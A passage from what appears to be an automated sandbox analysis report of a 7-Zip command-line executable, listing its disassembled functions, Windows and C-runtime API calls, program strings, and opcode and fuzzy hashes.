                                                                                                                                                                                                                                                                              • Part of subcall function 0066B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0066B4AA
                                                                                                                                                                                                                                                                              • Part of subcall function 0066B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0066B4F8
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00688343
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: free.MSVCRT ref: 00663431
                                                                                                                                                                                                                                                                              • Part of subcall function 00663404: memmove.MSVCRT ref: 0066344C
                                                                                                                                                                                                                                                                              • Part of subcall function 00668624: free.MSVCRT ref: 006686A9
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0068832B
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00688336
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$QueryValue$Openmemmove
                                                                                                                                                                                                                                                                            • String ID: 7z.dll$Software\7-zip
                                                                                                                                                                                                                                                                            • API String ID: 2771487249-1558686312
                                                                                                                                                                                                                                                                            • Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                                                                                            • Instruction ID: 7f82edb470310450b3a7c322df89a8ef8bb9d25dd3f3bee07ada834b4d9d4b23
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2511EC6230498090CA70FB21E4613DEB367EBD6BE0F841315AE5D977A6DF2CC64AC704
                                                                                                                                                                                                                                                                            Function 006A225C Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3873070119-0
                                                                                                                                                                                                                                                                            • Opcode ID: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                                                                                                                                                                                                                                                            • Instruction ID: ed23d1ad021dc62fc7df0016e82995e18e7e4a9a170442d1f0edc0ba99ddaa10
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5411827331494592DB20EF65E89035E6332F796BD4F404221EFAE83BA4DF29C955CB40
                                                                                                                                                                                                                                                                            Function 00666C84 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateDirectoryfree$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3252411863-0
                                                                                                                                                                                                                                                                            • Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                                                                                            • Instruction ID: 0b51f37d888384307baa163b7997eff110353dda2b0c0d9b5bd8cb9212c5813f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C801A732308A4081DA30EB62F9943BD9327EFC77F4F584220EA6D937A5DF19C9468B01
                                                                                                                                                                                                                                                                            Function 0069056F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                                                                                            • Instruction ID: ad4b9f1224d75db4887176b212f278a6d0b80eb185dcbbe56cea9d23f9659a9b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF03AB324A90542CB45FE32E47122E9316ABC7F91F0114669F0E67751CE38C487C308
                                                                                                                                                                                                                                                                            Function 0066EC90 Relevance: 7.5, APIs: 6, Instructions: 19COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                                                                                            • Instruction ID: 6038c0fb1bf69887149de29cfb8424d98df2a7858216da763a7636a3ff83276c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84E0F5B2618C0681CB94FF76DCB202CA326EBD7F8871410559F2EAB3A5CD20C8538388
                                                                                                                                                                                                                                                                            Function 006A24B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006A25EC
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006A2636
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$freememset
                                                                                                                                                                                                                                                                            • String ID: Name$Size
                                                                                                                                                                                                                                                                            • API String ID: 2276422817-481755742
                                                                                                                                                                                                                                                                            • Opcode ID: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                                                                                                                                                                                                                            • Instruction ID: 4ea9880b1bed6b52ec263b74c0f92c10a4e754e28e7942923293de7a6b48309e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C841F672610A81A2CB66EF38D4647DE3321F745B58F845126EF6E42351DF78CD8ACB44
                                                                                                                                                                                                                                                                            Function 006ABD5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ABDCD
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ABE0B
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$memset
                                                                                                                                                                                                                                                                            • String ID: : Removing files after including to archive$Removing
                                                                                                                                                                                                                                                                            • API String ID: 3543874852-1218467041
                                                                                                                                                                                                                                                                            • Opcode ID: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                                                                                                                                                                                                                            • Instruction ID: 1ed8cd2b016ef61a2a8e87cb3dc23f381aae58a948814a56c86173799c1047bc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F31A162200A8192DFA8FB31E4913EE6362E751784F449036DB9F56262DF7CE9CAC700
                                                                                                                                                                                                                                                                            Function 006AC47C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006AC4FD
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006AC50D
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006AC553
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$freememset
                                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                                            • API String ID: 2276422817-3653984579
                                                                                                                                                                                                                                                                            • Opcode ID: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                                                                                                                                                                                                                                                            • Instruction ID: 56c4139cf5f52c4d99c9e4d041d94307d39008cdb748ee21d58dc123359be69b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F11D612340A4241DB68FB35D8603AD6322FB86BE4F084235EF2E537A6DF38D855C784
                                                                                                                                                                                                                                                                            Function 006AB864 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006AB8EB
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006AB90A
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$freememset
                                                                                                                                                                                                                                                                            • String ID: ERROR: $WARNING:
                                                                                                                                                                                                                                                                            • API String ID: 2276422817-2114518728
                                                                                                                                                                                                                                                                            • Opcode ID: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                                                                                                                                                                                                                                                            • Instruction ID: ccfa3f833cb67edbad871e2a7a1c1ee88f24b78163e313a2c7fa6a301dc5d4aa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31116352301E8141DB64EF66E8617AE6312A786BE4F485229EF6F57391DF2CC885C348
                                                                                                                                                                                                                                                                            Function 006A10C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeavefputs
                                                                                                                                                                                                                                                                            • String ID: ERROR:
                                                                                                                                                                                                                                                                            • API String ID: 4171338575-977468659
                                                                                                                                                                                                                                                                            • Opcode ID: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                                                                                                                                                                                                                            • Instruction ID: aa5bb6cd25201a03b8cdceb923bd4b44003bf2d79f9104dce3b2ec7322d50043
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5111BF7230198185DB45EF25EC607A82323FB87FA4F488235DE6E5B3A4CF388895C714
                                                                                                                                                                                                                                                                            Function 006ABB9C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ABC6C
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 006ABC78
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: memset.MSVCRT ref: 006AB20D
                                                                                                                                                                                                                                                                              • Part of subcall function 006AB1C8: fputs.MSVCRT ref: 006AB232
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$freememset
                                                                                                                                                                                                                                                                            • String ID: Archive size: $Files read from disk
                                                                                                                                                                                                                                                                            • API String ID: 2276422817-3736835528
                                                                                                                                                                                                                                                                            • Opcode ID: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                                                                                                                                                                                                                                                            • Instruction ID: 000866b8ad4c15ba16975b384f5215ca800333750a36b06cff348f81d96f0ee0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD116363204D4290CF60FF24D8A139D6732EBC57E8F845626E65E876B9DF28C68AC704
                                                                                                                                                                                                                                                                            Function 00662974 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: a$z
                                                                                                                                                                                                                                                                            • API String ID: 0-4151050625
                                                                                                                                                                                                                                                                            • Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                                                                                            • Instruction ID: f833be87bc0b92f8335e9c38d27ee78153f29f8746a64a93f0dddb60e25b9794
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F018116F01C9795EB247B63A8743F9A253ABD6F92F8D83339E8917310D1194AD2E302
                                                                                                                                                                                                                                                                            Function 0066AD0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                            • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                                                                                                                            • API String ID: 1646373207-1489217083
                                                                                                                                                                                                                                                                            • Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                                                                                            • Instruction ID: a76810f2f03886d70f7b1a001d7fd0fdfa26a0cbf9736a3db80b0351780d447c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51F0AF3631050486DB30EFE0F4843E863A2AF89316F440435E74B62B60DB3CDA99CE16
                                                                                                                                                                                                                                                                            Function 006ABAAC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ABACF
                                                                                                                                                                                                                                                                            • fputs.MSVCRT ref: 006ABAFC
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 0066237E
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: fputs.MSVCRT ref: 006623B8
                                                                                                                                                                                                                                                                              • Part of subcall function 00662320: free.MSVCRT ref: 006623C4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
